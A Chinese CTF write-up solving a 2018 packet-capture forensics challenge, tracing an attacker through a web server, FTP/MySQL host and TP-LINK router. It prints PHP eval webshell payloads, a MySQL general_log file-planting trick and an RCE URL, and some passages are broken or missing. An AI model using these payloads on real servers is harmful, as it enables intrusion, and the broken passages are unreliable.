当前位置:网站首页 > 黑客培训 > 正文

2018.5.18信息安全铁人三项赛数据赛题解

freebuffreebuf 2018-06-06 312 0

本文来源:2018.5.18信息安全铁人三项赛数据赛题解

本文原创作者:一叶飘零

原创投稿详情:重金悬赏 | 合天原创投稿等你


目录

题目描述

第一个数据包

第三个数据包

第四个数据包

路由器hacking

后记

题目描述

1.黑客的IP是多少

2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)

3.服务器拿到的webshell的网址(请输入url解码后的网址)

4.服务器1.99的主机名

5.网站根目录的绝对路径(注意最后加斜杠)

6.黑客上传的第一个文件名称是什么

7.黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)

8.服务器2.88的ftp服务账号密码(格式:账号/密码)

9.黑客成功登陆ftp的时间(格式:10:15:36)

10.黑客在ftp中下载的敏感文件名称是什么

11.服务器2.88中用户名为admin_zz的web后台管理员的密码

12.服务器2.88的mysql账号密码(格式:账号/密码)

13.服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔

14.请列出黑客设置的genreal log的绝对路径(将路径复制出来,区分大小写)

15.路由器的品牌、型号、版本(请直接复制粘贴)

16.列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

17.在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

18.路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)

19.路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例: 255 255.255.0则为24 (格式:用英文逗号分隔)

20.路由器的5Gwif名称是什么,信道是多少(格式:名称信道)


题目文件:

链接: https://pan.baidu.com/s/1DKTlpELe4WSBvkb2pU7vQQ

密码: shna


第一个数据包

上来先过滤http流量,随意浏览

image.png

可以发现202.1.1.2执行了phpinfo()命令

无疑是黑客ip,而192.168.1.99显然就是受害者了

我们进一步利用这一特点,进行过滤

(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.99) ?php /* con_db_host = "localhost" con_db_id = "root" con_db_pass = "S1mp13zz" con_db_name = "met" tablepre = "met_" db_charset = "utf8"; */ ?>

即mysql账号密码:`localhost/S1mp13zz`

下面我们去寻找admin_zz的密码

ip.addr == 192.168.1.99 ?php eval($_POST[a]);?>' into outfile 'c:/phpStudy/WWW/aaa.php'

但是返回了错误

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

于是黑客进行了一系列的更改

在后续的一条操作中,可以明显看到

image.png

set global general_log_file='c:/phpStudy/WWW/config/config.php'

路径为

c:/phpStudy/WWW/config/config.php

同时可以确定192.168.2.88为一台windows

路由器hacking

剩下的5个题均为路由器的题,这就很难受了,之前一直很少接触路由器的流量分析

后来转念一想,路由器一般都是192.168.0.1吧

于是我查了一下这个ip

ip.addr == 192.168.0.1 && http

image.png

发现的确是有web服务的

我们进行查找

image.png

很快,在第一个返回200的包里就找到了答案

{ "id":1, "result":{ "locale":"zh_CN", "force":false, "radio":2, "model":"TL-WAR1300L v1.0" }, "error_code":"0" }

答案为

TL-WAR1300L v1.0

我们系统的看一下这些流量,不难发现,黑客先进行了密码爆破

image.png

而之前的登录error_code均为700

可见最后黑客成功登入

然后黑客进行了read选项

image.png

才有了如上的版本信息

然后我们看到黑客进行了如下操作

image.png

然后得到回显

{   "id": 1,   "result": {    "normal": [{     "py_isup": false,     "ipaddr": "",     "t_type": "ethernet",     "t_isup": "disconnect",     "t_name": "WAN1",     "t_linktype": "dhcp"    },{     "py_isup": false,     "ipaddr": "",     "t_type": "ethernet",     "t_isup": "disconnect",     "t_name": "WAN2",     "t_linktype": "dhcp"    },{     "py_isup": false,     "ipaddr": "",     "dhcp_status": "on",     "t_type": "ethernet",     "t_name": "LAN1",     "t_isup": "disconnect",     "t_linktype": "static"    }, {     "py_isup": false,     "ipaddr": "",     "dhcp_status": "on",     "t_type": "ethernet",     "t_name": "LAN2",     "t_isup": "disconnect",     "t_linktype": "static"    }, {     "py_isup": false,     "ipaddr": "",     "dhcp_status": "on",     "t_type": "ethernet",     "t_name": "LAN3",     "t_isup": "disconnect",     "t_linktype": "static"    }]   },   "error_code": "0"  } 

目前2个wan和2个LAN都是关闭状态,`py_isup`清晰可见

接着后面又出现了一个类似的内容

image.png

{ "id":1, "result":{     "normal":[         {             "py_isup":true,             "ipaddr":"202.1.1.1",             "t_type":"ethernet",             "t_isup":"connect",             "t_name":"WAN1",             "t_linktype":"static"      },         {             "py_isup":true,             "ipaddr":"192.168.12.173",             "t_type":"ethernet",             "t_isup":"internet",             "t_name":"WAN2",             "t_linktype":"dhcp"      },         {             "py_isup":true,             "ipaddr":"192.168.0.1",             "dhcp_status":"on",             "t_type":"ethernet",             "t_name":"LAN1",             "t_isup":"connect",             "t_linktype":"static"      },         {             "py_isup":true,             "ipaddr":"192.168.0.1",             "dhcp_status":"on",             "t_type":"ethernet",             "t_name":"LAN2",             "t_isup":"connect",             "t_linktype":"static"      },         {             "py_isup":false,             "ipaddr":"192.168.0.1",             "dhcp_status":"on",             "t_type":"ethernet",             "t_name":"LAN3",             "t_isup":"disconnect",             "t_linktype":"static"      }  ]  }, "error_code":"0"  } 

此时可以发现一共有5个接口,其中WAN1、WAN2、LAN1、LAN2均被打开

并且ip为:

202.1.1.1

192.168.12.173

192.168.0.1

故此16,18题均被解答

然后是子网掩码的问题,这里我选择搜索网关相关内容

ip.addr == 192.168.0.1 && http contains "gateway"

然后可以发现如下数据

image.png

{ "id":1, "result":[     {         "metric":"0",         "gateway":"192.168.12.254",         "mask":"0.0.0.0",         "dest":"0.0.0.0",         "interface":"WAN2"  },     {         "metric":"0",         "gateway":"0.0.0.0",         "mask":"255.0.0.0",         "dest":"127.0.0.0",         "interface":"lo"  },     {         "metric":"0",         "gateway":"0.0.0.0",         "mask":"255.255.252.0",         "dest":"192.168.0.0",         "interface":"LAN"  },     {         "metric":"0",         "gateway":"0.0.0.0",         "mask":"255.255.255.0",         "dest":"192.168.12.0",         "interface":"WAN2"  },     {         "metric":"0",         "gateway":"0.0.0.0",         "mask":"255.255.255.0",         "dest":"202.1.1.0",         "interface":"WAN1"  }  ], "error_code":"0"  } 

所以一共有5条,第三条为

{     "metric":"0",     "gateway":"0.0.0.0",     "mask":"255.255.252.0",     "dest":"192.168.0.0",     "interface":"LAN"  } 

子网掩码为`255.255.252.0`

至此19题完结

然后最后问到信道,于是我的过滤为

ip.addr == 192.168.0.1 && http contains "channel"

image.png

得到数据

{      "id":1,      "result":{          "1":{              "mssid":[                  "test-ge1"              ],              "wds":"off",              "channel":36,              "mode":"11anac mixed",              "radio_enable":"on",              "amount":0,              "frequency":"5G"          },          "0":{              "mssid":[                  "test-ge1"              ],              "wds":"off",              "channel":1,              "mode":"11bgn mixed",              "radio_enable":"on",              "amount":1,              "frequency":"2.4G"          },          "2":{              "mssid":[                  "TP-LINK_GUEST_6258"              ],              "amount":0,              "mode":"11bgn mixed",              "radio_enable":"off",              "frequency":"visitor"          }      },      "error_code":"0"  } 

重点为

"1":{     "mssid":[         "test-ge1"  ],     "wds":"off",     "channel":36,     "mode":"11anac mixed",     "radio_enable":"on",     "amount":0,     "frequency":"5G"  } 

可以清晰看到,名称为`test-ge1`,信道为36

然后是最最蛇皮的17问:在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

这个我可以说相当薄弱了,并不是很懂,但是其中提及端口,于是我的关键词为

ip.addr == 192.168.0.1 && http contains "port"

数据并不是很多,看到最后有

image.png

{ "id":1, "result":{ "state":"on", "mode":"both", "mirroredports":[ "1", "2" ], "mirrorport":"3" }, "error_code":"0" }

可以断定答案为

3-->1,2

最后阶段归纳一下答案

14.请列出黑客设置的genreal log的绝对路径(将路径复制出来,区分大小写)

c:/phpStudy/WWW/config/config.php

15.路由器的品牌、型号、版本(请直接复制粘贴)

TL-WAR1300L v1.0

16.列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

192.168.0.1,192.168.12.173,202.1.1.1

17.在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

3-->1,2

18.路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)

5,2,2

19.路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例: 255 255.255.0则为24 (格式:用英文逗号分隔)

5,255.255.252.0

20.路由器的5Gwif名称是什么,信道是多少(格式:名称信道)

test-ge136

后记

最后完整答案为:

1.黑客的IP是多少

202.1.1.2

2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)

EasyTalk X2.0.1

3.服务器拿到的webshell的网址(请输入url解码后的网址)

http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}

4.服务器1.99的主机名

simplefight1

5.网站根目录的绝对路径(注意最后加斜杠)

/var/www/html/easytalk

6.黑客上传的第一个文件名称是什么

scan.php

7.黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)

21,80,8080,1433,3306

8.服务器2.88的ftp服务账号密码(格式:账号/密码)

administrator:123456

9.黑客成功登陆ftp的时间(格式:10:15:36)

14:07:15

10.黑客在ftp中下载的敏感文件名称是什么

config_db.php

11.服务器2.88中用户名为admin_zz的web后台管理员的密码

1q2w3e4r

12.服务器2.88的mysql账号密码(格式:账号/密码)

localhost/S1mp13zz

13.服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔

met_admin_array met_admin_column met_admin_table

14.请列出黑客设置的genreal log的绝对路径(将路径复制出来,区分大小写)

c:/phpStudy/WWW/config/config.php

15.路由器的品牌、型号、版本(请直接复制粘贴)

TL-WAR1300L v1.0

16.列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

192.168.0.1,192.168.12.173,202.1.1.1

17.在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1-->2,3,4

3-->1,2

18.路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)

5,2,2

19.路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例: 255 255.255.0则为24 (格式:用英文逗号分隔)

5,255.255.252.0

20.路由器的5Gwif名称是什么,信道是多少(格式:名称信道)

test-ge136

没想到最后竟然突然来了个路由器hacking,完全摸不到边,纯靠题目转英文进行过滤……

最蛇皮的是最后2个包都没用到,希望可以加强自身各种类型的流量分析的能力吧= =


(注:本文属于合天原创投稿奖励,未经允许,禁止转载!)

转载请注明来自网盾网络安全培训,本文标题:《2018.5.18信息安全铁人三项赛数据赛题解》

标签:CTF铁人三项

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表